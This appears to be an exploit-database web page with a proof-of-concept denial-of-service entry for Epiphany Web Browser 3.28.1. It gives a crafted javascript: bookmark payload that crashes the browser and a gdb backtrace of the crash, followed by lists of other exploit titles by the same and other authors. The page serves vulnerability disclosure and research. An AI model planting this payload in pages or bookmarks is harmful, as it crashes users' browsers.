Menu

Search for hundreds of thousands of exploits

"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)"

Author

Exploit author

"Dhiraj Mishra"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-08-23

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
# Author: Dhiraj Mishra
# Date: 2018-08-23
# Software: https://projects-old.gnome.org/epiphany/
# Version: 3.28.1
# CVE: N/A
# Tested on: Ubuntu 18 64bit

# Steps to reproduce:
1. Open epiphany browser
2. Bookmark any random page
3. Then navigate to bookmark properties set:
    Name = Crash
    Address = javascript:window.open('javascript:document.write("<script></script>");');
4. Browser any URL's and try to open the above bookmark
5. The browser crashes

# Below backtrace for your reference.

$ gdb epiphany
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from epiphany...(no debugging symbols found)...done.
(gdb) r
Starting program: /usr/bin/epiphany 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08b6700 (LWP 9295)]
[New Thread 0x7fffdee4b700 (LWP 9296)]
[New Thread 0x7fffde64a700 (LWP 9297)]
[New Thread 0x7fffdcdcf700 (LWP 9298)]
[New Thread 0x7fff8fffd700 (LWP 9299)]
[New Thread 0x7fff8f7fc700 (LWP 9300)]
[New Thread 0x7fff8effb700 (LWP 9301)]
[New Thread 0x7fff8e38b700 (LWP 9302)]
[New Thread 0x7fff8db8a700 (LWP 9303)]
[New Thread 0x7fff8d389700 (LWP 9305)]
[New Thread 0x7fff77b0a700 (LWP 9310)]
[New Thread 0x7fff7598c700 (LWP 9320)]
[New Thread 0x7fff7518b700 (LWP 9321)]
[New Thread 0x7fff7498a700 (LWP 9327)]
[New Thread 0x7fff7698c700 (LWP 9334)]
[New Thread 0x7fff5ffff700 (LWP 9335)]
[New Thread 0x7fff5f7fe700 (LWP 9336)]
[New Thread 0x7fff5effd700 (LWP 9337)]
[New Thread 0x7fff5e7fc700 (LWP 9338)]
[New Thread 0x7fff5dffb700 (LWP 9339)]
[Thread 0x7fff8db8a700 (LWP 9303) exited]
[Thread 0x7fff8e38b700 (LWP 9302) exited]
[Thread 0x7fff5e7fc700 (LWP 9338) exited]
[Thread 0x7fff7698c700 (LWP 9334) exited]
[Thread 0x7fff5f7fe700 (LWP 9336) exited]
[Thread 0x7fff5effd700 (LWP 9337) exited]
[Thread 0x7fff5dffb700 (LWP 9339) exited]
[Thread 0x7fff5ffff700 (LWP 9335) exited]
Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status
[New Thread 0x7fff5ffff700 (LWP 9399)]
[Thread 0x7fff7498a700 (LWP 9327) exited]
[New Thread 0x7fff7498a700 (LWP 9402)]
[Thread 0x7fff7498a700 (LWP 9402) exited]

Thread 22 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff5ffff700 (LWP 9399)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0  0x00007ffff7b75db7 in  () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1  0x00007ffff7079be6 in  () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2  0x00007ffff73fe7d0 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3  0x00007ffff73fde05 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4  0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
#5  0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-03-11 "Wing FTP Server - Authenticated CSRF (Delete Admin)" webapps php "Dhiraj Mishra"
2020-02-06 "VIM 8.2 - Denial of Service (PoC)" dos linux "Dhiraj Mishra"
2020-01-16 "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal" webapps multiple "Dhiraj Mishra"
2019-06-06 "Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion" webapps hardware "Dhiraj Mishra"
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-04-30 "Spring Cloud Config 2.1.x - Path Traversal (Metasploit)" webapps java "Dhiraj Mishra"
2019-04-26 "Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting" webapps java "Dhiraj Mishra"
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-01-21 "GattLib 0.2 - Stack Buffer Overflow" remote linux "Dhiraj Mishra"
2018-11-06 "libiec61850 1.3 - Stack Based Buffer Overflow" local linux "Dhiraj Mishra"
2018-08-23 "Epiphany Web Browser 3.28.1 - Denial of Service (PoC)" dos linux "Dhiraj Mishra"
2018-08-14 "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)" webapps linux "Dhiraj Mishra"
2018-08-14 "cgit 1.2.1 - Directory Traversal (Metasploit)" webapps linux "Dhiraj Mishra"
2018-06-11 "WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)" dos linux "Dhiraj Mishra"
2018-06-05 "WebKitGTK+ < 2.21.3 - Crash (PoC)" local linux "Dhiraj Mishra"
2018-06-01 "Epiphany 3.28.2.1 - Denial of Service" dos multiple "Dhiraj Mishra"
2018-04-05 "WebRTC - Private IP Leakage (Metasploit)" webapps multiple "Dhiraj Mishra"
2017-12-20 "Samsung Internet Browser - SOP Bypass (Metasploit)" remote android "Dhiraj Mishra"
2017-09-02 "IBM Notes 8.5.x/9.0.x - Denial of Service" dos multiple "Dhiraj Mishra"
2017-08-31 "IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)" dos multiple "Dhiraj Mishra"
2017-08-31 "IBM Notes 8.5.x/9.0.x - Denial of Service (2)" dos multiple "Dhiraj Mishra"
2017-08-30 "Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery" webapps ruby "Dhiraj Mishra"
2017-08-09 "Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery" webapps multiple "Dhiraj Mishra" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected